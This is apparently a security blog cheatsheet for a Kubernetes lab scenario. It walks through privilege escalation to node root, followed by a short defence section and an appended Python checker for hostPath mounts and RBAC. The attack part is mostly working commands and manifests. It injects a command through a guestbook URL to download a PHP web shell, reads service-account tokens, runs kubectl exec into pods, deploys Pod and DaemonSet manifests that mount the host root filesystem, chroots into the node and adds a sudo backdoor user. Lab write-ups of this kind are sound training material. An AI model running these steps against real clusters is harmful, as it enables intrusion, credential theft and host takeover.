[ Home ] [ Writeups ] [ Papers ] [ Cheatsheets ] [ About ]


.:: KUBERNETES Exploitation 1 ::.

~ Cheatsheet ~
cabir - KUBERNETES 1
Title : CLUSTER KUBERNETES - SCENARIO 1 : Inguardians Environment
Author : cabir
Date : Sept 13, 2019
-=[ Privilege escalation with malicious pod ]=-
# Fingerprint

1. Inspect the code
2. Inspect controller.js
   - http://10.23.58.40:31600/guestbook.php?cmd=set&key=message&value=test
   - http://10.23.58.40:31600/guestbook.php?cmd=set&key=command&value=curl%20https://raw.githubusercontent.com/artyuum/Simple-PHP-Web-Shell/master/index.php%20--output%20shell.php

# Download web shell with RCE

    curl https://github.com/artyuum/Simple-PHP-Web-Shell --output shell.php

# Collect data (service account credentials mounted in the pod)

    cat /run/secrets/kubernetes.io/serviceaccount/ca.crt
    cat /run/secrets/kubernetes.io/serviceaccount/token
    cat /run/secrets/kubernetes.io/serviceaccount/namespace

# List pods

    ./kubectl --token=`cat jwt.txt` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 get pods

# Check whether the service account may exec commands in pods

    ./kubectl --token=`cat jwt.txt` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 auth can-i exec pods

# Exec an interactive shell in a pod

    ./kubectl --token=`cat jwt.txt` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 exec -it frontend-586dd8d476-cb8nc /bin/bash

# Download the kubectl binary

    curl -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl

# Prompt colour (user friendly)

    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '

# Export the token in $TOKEN

    export TOKEN=`cat /run/secrets/kubernetes.io/serviceaccount/token`

# Set up an alias

    alias kubectl="/data/kubectl --token=$TOKEN --certificate-authority=/run/secrets/kubernetes.io/serviceaccount/ca.crt --server=https://10.23.58.40:6443"

# Create a malicious pod that mounts the host / (read)

    apiVersion: v1
    kind: Pod
    metadata:
      name: attack-pod
      namespace: default
    spec:
      containers:
      - image: janeczku/alpine-kubernetes
        imagePullPolicy: IfNotPresent
        name: attack-container
        volumeMounts:
        - mountPath: /root
          name: mount-host-root-into-mnt-pods
      volumes:
      - name: mount-host-root-into-mnt-pods
        hostPath:
          path: /

OR

# Use a malicious DaemonSet to get a pod on every node

    apiVersion: apps/v1
    kind: DaemonSet
    metadata:
      name: attack-daemonset
      labels:
        app: attack-daemonset
    spec:
      selector:
        matchLabels:
          app: attack-daemonset
      template:
        metadata:
          labels:
            app: attack-daemonset
        spec:
          containers:
          - name: alpine-attack
            image: janeczku/alpine-kubernetes
            volumeMounts:
            - mountPath: /root
              name: mount-host-root-into-mnt-pods
          volumes:
          - name: mount-host-root-into-mnt-pods
            hostPath:
              path: /

# Exec a shell in the attack-pod

    ./kubectl --token=`cat jwt.txt` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 exec -it attack-pod /bin/sh

# Chroot into the host file system

    chroot /root /bin/bash

# Add a new user to SSH into the node

    adduser owned
    adduser owned sudo

# Retrieve the host IP

    cat /root/etc/network/interfaces

    # KVM uses ens3
    auto ens3
    iface ens3 inet static
      address 10.23.58.40   <----
      netmask 255.255.255.0
      gateway 10.23.58.2
      dns-nameservers 10.23.58.2

# SSH into the host (node)

    ssh owned@[node-ip]

________________________________________________

# Defending

1. Create a service account for redis
2. Create a Role that only allows get on pods
3. Create a RoleBinding for it (bind the redis service account to the Role that only allows get on pods)
4. Restart all redis pods

# Sources

Inguardians - Bust A Kube
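The following Python is an added example, not part of this cheatsheet or of the Bust-A-Kube material. It covers both halves of the page from the defender's side: a check that flags Pod or DaemonSet manifests mounting the node's root filesystem through hostPath (the attack-pod and attack-daemonset manifests above are transcribed as dicts), and the least-privilege RBAC objects that steps 1-3 of the Defending section call for, together with a check that the Role grants nothing the escalation chain needed (create pods, create pods/exec, create daemonsets). The object names `redis` and `redis-get-pods`, the benign `frontend` pod and the over-broad role are assumptions constructed for the example; the manifests are emitted as JSON, which `kubectl apply -f` accepts as well as YAML.

```python
"""Defensive checks for the manifests in this cheatsheet (added example, not page code).

  1. Does a Pod / DaemonSet manifest mount the node's root filesystem via hostPath?
  2. Does a Role give a service account more than 'get pods'?
Manifests are plain dicts, the JSON form that `kubectl apply -f` accepts.
"""
import json

# The page's attack-pod and attack-daemonset manifests, transcribed as dicts.
ATTACK_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "attack-pod", "namespace": "default"},
    "spec": {"containers": [{"image": "janeczku/alpine-kubernetes", "imagePullPolicy": "IfNotPresent",
                             "name": "attack-container",
                             "volumeMounts": [{"mountPath": "/root", "name": "mount-host-root-into-mnt-pods"}]}],
             "volumes": [{"name": "mount-host-root-into-mnt-pods", "hostPath": {"path": "/"}}]}}
ATTACK_DAEMONSET = {
    "apiVersion": "apps/v1", "kind": "DaemonSet",
    "metadata": {"name": "attack-daemonset", "labels": {"app": "attack-daemonset"}},
    "spec": {"selector": {"matchLabels": {"app": "attack-daemonset"}},
             "template": {"metadata": {"labels": {"app": "attack-daemonset"}},
                          "spec": {"containers": [{"name": "alpine-attack", "image": "janeczku/alpine-kubernetes",
                                                   "volumeMounts": [{"mountPath": "/root",
                                                                     "name": "mount-host-root-into-mnt-pods"}]}],
                                   "volumes": [{"name": "mount-host-root-into-mnt-pods", "hostPath": {"path": "/"}}]}}}}
# Constructed benign pod (assumption) with no hostPath, for contrast.
FRONTEND_POD = {"apiVersion": "v1", "kind": "Pod", "metadata": {"name": "frontend"},
                "spec": {"containers": [{"name": "php", "image": "php:apache"}]}}


def _pod_spec(manifest):
    """PodSpec of a bare Pod, or of the template inside a workload (DaemonSet, Deployment...)."""
    if manifest.get("kind") == "Pod":
        return manifest.get("spec", {})
    return manifest.get("spec", {}).get("template", {}).get("spec", {})


def hostpath_mounts(manifest):
    """(volume, host path, container, mount path) for every hostPath volume a container mounts."""
    spec = _pod_spec(manifest)
    host_volumes = {v["name"]: v["hostPath"].get("path", "")
                    for v in spec.get("volumes", []) if "hostPath" in v}
    return [(m["name"], host_volumes[m["name"]], c["name"], m["mountPath"])
            for c in spec.get("containers", [])
            for m in c.get("volumeMounts", []) if m["name"] in host_volumes]


def mounts_host_root(manifest):
    """True when any container gets the whole node filesystem (hostPath '/'), as attack-pod does."""
    return any(path == "/" for _, path, _, _ in hostpath_mounts(manifest))


# Least-privilege RBAC for the redis service account (Defending steps 1-3; names assumed).
REDIS_SA = {"apiVersion": "v1", "kind": "ServiceAccount",
            "metadata": {"name": "redis", "namespace": "default"}}
REDIS_ROLE = {"apiVersion": "rbac.authorization.k8s.io/v1", "kind": "Role",
              "metadata": {"name": "redis-get-pods", "namespace": "default"},
              "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get"]}]}
REDIS_BINDING = {"apiVersion": "rbac.authorization.k8s.io/v1", "kind": "RoleBinding",
                 "metadata": {"name": "redis-get-pods", "namespace": "default"},
                 "subjects": [{"kind": "ServiceAccount", "name": "redis", "namespace": "default"}],
                 "roleRef": {"apiGroup": "rbac.authorization.k8s.io", "kind": "Role", "name": "redis-get-pods"}}
# Constructed over-broad Role (assumption) of the kind that lets the chain above succeed.
OVERBROAD_ROLE = {"kind": "Role", "metadata": {"name": "too-much"},
                  "rules": [{"apiGroups": ["", "apps"], "resources": ["*"], "verbs": ["*"]}]}

# (verb, resource, apiGroup) the escalation on this page relied on.
ESCALATION_PRIVILEGES = [("create", "pods", ""),            # schedule a hostPath pod
                         ("create", "pods/exec", ""),       # kubectl exec into it
                         ("create", "daemonsets", "apps")]  # land a pod on every node


def role_allows(role, verb, resource, api_group=""):
    """True if a rule grants verb on resource; honours '*' and the 'pods/*' subresource wildcard."""
    sub_wild = resource.split("/")[0] + "/*"
    for rule in role.get("rules", []):
        groups, resources, verbs = rule.get("apiGroups", []), rule.get("resources", []), rule.get("verbs", [])
        if ("*" in groups or api_group in groups) \
                and ("*" in resources or resource in resources or sub_wild in resources) \
                and ("*" in verbs or verb in verbs):
            return True
    return False


def excess_privileges(role):
    """Which of the escalation privileges this Role still grants (empty list is the goal)."""
    return [(v, r) for v, r, g in ESCALATION_PRIVILEGES if role_allows(role, v, r, g)]


def rbac_bundle():
    """The three RBAC objects as one List, ready for `kubectl apply -f rbac.json`."""
    return {"apiVersion": "v1", "kind": "List", "items": [REDIS_SA, REDIS_ROLE, REDIS_BINDING]}


if __name__ == "__main__":
    for m in (ATTACK_POD, ATTACK_DAEMONSET, FRONTEND_POD):
        print(m["metadata"]["name"], "mounts host /:", mounts_host_root(m), hostpath_mounts(m))
    print("redis-get-pods excess:", excess_privileges(REDIS_ROLE))
    print("too-much excess:", excess_privileges(OVERBROAD_ROLE))
    with open("rbac.json", "w") as fh:
        json.dump(rbac_bundle(), fh, indent=2)
```

Run it to see the two attack manifests flagged and the frontend pod pass, then apply `rbac.json` and set `serviceAccountName: redis` on the redis pods before restarting them (step 4). The hostPath check walks the pod template, so it applies equally to Deployments and other workloads, not only the Pod and DaemonSet shown on the page; note that `resources: ["pods"]` does not cover the `pods/exec` subresource, which is why the redis Role blocks the `auth can-i exec pods` path used above.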